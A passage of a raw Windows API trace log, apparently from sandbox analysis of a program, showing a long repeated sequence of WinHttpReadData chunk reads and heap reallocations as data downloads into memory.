lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9e6810*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.872] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xfc800) returned 0xf8ef010 [0164.872] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf9e9010, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf9e9010*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.873] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf8ef010, Size=0xff000) returned 0x90d8040 [0164.926] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91d4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91d4840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.928] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d8040, Size=0x101800) returned 0xafd0040 [0164.963] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0cf040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0cf040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.964] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd0040, Size=0x104000) returned 0x90d5040 [0165.010] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91d6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91d6840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.011] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d5040, Size=0x106800) returned 0xafda040 [0165.109] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0de040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0de040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.110] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafda040, Size=0x109000) returned 0x90d2040 [0165.161] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91d8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91d8840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.162] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d2040, Size=0x10b800) returned 0xafd3040 [0165.255] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0dc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0dc040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.256] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd3040, Size=0x10e000) returned 0x90da040 [0165.357] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91e5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91e5840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.358] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90da040, Size=0x110800) returned 0xafd5040 [0165.384] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0e3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0e3040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.385] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd5040, Size=0x113000) returned 0x90d3040 [0165.410] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91e3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91e3840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.410] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d3040, Size=0x115800) returned 0xafd6040 [0165.436] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0e9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0e9040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.437] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd6040, Size=0x118000) returned 0x90d5040 [0165.560] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91ea840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91ea840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.560] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d5040, Size=0x11a800) returned 0xafd7040 [0165.592] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0ef040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0ef040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.593] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd7040, Size=0x11d000) returned 0x90d0040 [0165.623] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91ea840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91ea840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.623] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d0040, Size=0x11f800) returned 0xafd9040 [0165.739] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0f6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0f6040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.740] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd9040, Size=0x122000) returned 0x90d1040 [0165.778] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91f0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91f0840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.779] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d1040, Size=0x124800) returned 0xafda040 [0165.812] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0fc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0fc040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.812] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafda040, Size=0x127000) returned 0x90da040 [0165.842] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91fe840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91fe840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.843] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90da040, Size=0x129800) returned 0xafd5040 [0165.947] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb0fc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb0fc040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.948] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd5040, Size=0x12c000) returned 0x90d3040 [0165.975] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x91fc840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x91fc840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0165.984] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d3040, Size=0x12e800) returned 0xafd8040 [0166.009] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb104040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb104040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.010] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd8040, Size=0x131000) returned 0x90d5040 [0166.034] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9203840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x9203840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.248] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d5040, Size=0x133800) returned 0xafda040 [0166.292] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb10b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb10b040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.293] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafda040, Size=0x136000) returned 0xf3ff040 [0166.328] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf532840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf532840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.328] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3ff040, Size=0x138800) returned 0x90d4040 [0166.364] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x920a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x920a040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.365] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x90d4040, Size=0x13b000) returned 0xafdb040 [0166.546] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb113840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb113840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.550] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafdb040, Size=0x13d800) returned 0xf3f3040 [0166.588] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf52e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf52e040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.589] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f3040, Size=0x140000) returned 0xafd6040 [0166.657] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb113840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb113840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.658] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd6040, Size=0x142800) returned 0xf3f4040 [0166.691] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf534040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf534040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.691] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f4040, Size=0x145000) returned 0xafdf040 [0166.730] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb121840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb121840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.731] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafdf040, Size=0x147800) returned 0xf3f0040 [0166.893] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf535040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf535040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.893] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f0040, Size=0x14a000) returned 0xafda040 [0166.928] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb121840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb121840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.929] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafda040, Size=0x14c800) returned 0xf3f5040 [0166.970] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf53f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf53f040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0166.971] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f5040, Size=0x14f000) returned 0xafd1040 [0167.044] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb11d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb11d840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.045] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd1040, Size=0x151800) returned 0xf3f9040 [0167.086] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf548040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf548040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.086] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f9040, Size=0x154000) returned 0xafd4040 [0167.229] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb125840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb125840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.230] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd4040, Size=0x156800) returned 0xf3f2040 [0167.271] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf546040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf546040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.271] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f2040, Size=0x159000) returned 0xafde040 [0167.305] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb134840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb134840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.306] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafde040, Size=0x15b800) returned 0xf3f6040 [0167.340] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf54f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf54f040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.340] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f6040, Size=0x15e000) returned 0xafdd040 [0167.451] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb138840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb138840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.451] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafdd040, Size=0x160800) returned 0xf3f1040 [0167.484] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf54f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf54f040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.485] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f1040, Size=0x163000) returned 0xafdb040 [0167.522] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb13b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb13b840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.523] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafdb040, Size=0x165800) returned 0xf3fb040 [0167.662] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf55e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf55e040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.662] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fb040, Size=0x168000) returned 0xafd7040 [0167.704] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb13c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb13c840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.704] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd7040, Size=0x16a800) returned 0xf3fd040 [0167.866] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf565040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf565040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0167.869] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fd040, Size=0x16d000) returned 0xafd6040 [0168.163] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb140840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb140840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.164] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd6040, Size=0x16f800) returned 0xf3f6040 [0168.411] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf563040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf563040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.411] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f6040, Size=0x172000) returned 0xafda040 [0168.488] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb149840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb149840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.489] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafda040, Size=0x174800) returned 0xf3f3040 [0168.563] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf565040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf565040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.564] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f3040, Size=0x177000) returned 0xafd6040 [0168.608] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xb14a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xb14a840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.609] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xafd6040, Size=0x179800) returned 0xf3fc040 [0168.655] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf573040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf573040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.656] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fc040, Size=0x17c000) returned 0xf583040 [0168.807] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf6fc840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf6fc840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.808] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf583040, Size=0x17e800) returned 0xf3fb040 [0168.854] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf577040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf577040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.854] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fb040, Size=0x181000) returned 0xf58b040 [0168.940] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf709840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf709840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0168.941] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf58b040, Size=0x183800) returned 0xf3f3040 [0169.004] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf574040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf574040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0169.005] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f3040, Size=0x186000) returned 0xf58b040 [0169.404] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf70e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf70e840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0169.408] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf58b040, Size=0x188800) returned 0xf3f5040 [0169.502] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf57b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf57b040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0169.503] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f5040, Size=0x18b000) returned 0xf589040 [0169.587] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf711840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf711840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0169.588] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf589040, Size=0x18d800) returned 0xfdd4040 [0169.637] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff5f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff5f040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0169.637] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfdd4040, Size=0x190000) returned 0xf3fb040 [0169.801] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf588840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf588840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0169.803] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fb040, Size=0x192800) returned 0xf59a040 [0169.851] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf72a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf72a040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0169.851] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf59a040, Size=0x195000) returned 0xf3f1040 [0169.953] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf583840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf583840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0169.954] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f1040, Size=0x197800) returned 0xf591040 [0170.011] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf726040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf726040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.011] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf591040, Size=0x19a000) returned 0xfdd7040 [0170.154] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff6e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff6e840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.154] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfdd7040, Size=0x19c800) returned 0xf3ff040 [0170.199] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf599040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf599040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.200] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3ff040, Size=0x19f000) returned 0xf5ad040 [0170.247] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf749840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf749840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.248] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf5ad040, Size=0x1a1800) returned 0xf3fd040 [0170.384] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf59c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf59c040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.385] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fd040, Size=0x1a4000) returned 0xfddb040 [0170.432] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff7c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff7c840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.433] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfddb040, Size=0x1a6800) returned 0xf3fa040 [0170.629] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf59e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf59e040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.630] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fa040, Size=0x1a9000) returned 0xfdd8040 [0170.675] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff7e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff7e840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.676] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfdd8040, Size=0x1ab800) returned 0xf3ff040 [0170.757] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf5a8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf5a8040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.758] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3ff040, Size=0x1ae000) returned 0xfdd9040 [0170.811] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff84840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff84840*, 